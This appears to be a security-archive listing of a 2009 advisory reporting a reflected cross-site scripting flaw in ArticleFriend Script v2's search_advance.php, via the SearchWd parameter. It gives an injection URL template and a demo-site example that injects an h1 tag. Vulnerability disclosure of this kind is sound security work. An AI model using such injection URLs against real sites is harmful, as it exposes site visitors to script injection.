ArticleFriend Script Cross Site Scripting

ArticleFriend Script Cross Site Scripting: Posted Aug 5, 2009; Authored by MizoZ; ArticleFriend Script version 2 suffers from a cross site scripting vulnerability in search_advance.php.; tags | exploit, php, xss; SHA-256 | fc7bf25516fdf3ca53f943595f1628e2f13310fc5c351f7b965d9f1a0fe13b86; Download | Favorite | View

ArticleFriend Script Cross Site Scripting

/*

ArticleFriend Script v2 (search_advance.php SearchWd) XSS Vulnerability

Discovered by : MizoZ
Contact : mizoz@9.cn <mizozx@gmail.com>
Team : EvilWay

Date : July 29 2009

Greetings : Moudi , Zuka, All friends

*/

We can inject HTML code on the GET (SearchWd) in faille search_advance.php .

[HOST]/[PATH]/search_advance.php?SearchWd=[XSS]

Ex :
http://articlefriend.com/demo/search_advance.php?SearchWd=%3Ch1%3EMizoZ%3C/h1%3E

Top Authors In Last 30 Days

Red Hat 227 files
Ubuntu 96 files
Gentoo 33 files
Debian 23 files
Google Security Research 19 files
Mirabbas Agalarov 17 files
indoushka 15 files
Apple 9 files
CraCkEr 9 files
Ivan Fratric 8 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,753)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,776)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,311)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,626)
UNIX (9,236)
UnixWare (186)
Windows (6,555)
Other

ArticleFriend Script Cross Site Scripting

ArticleFriend Script Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ArticleFriend Script Cross Site Scripting

Share This

ArticleFriend Script Cross Site Scripting

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems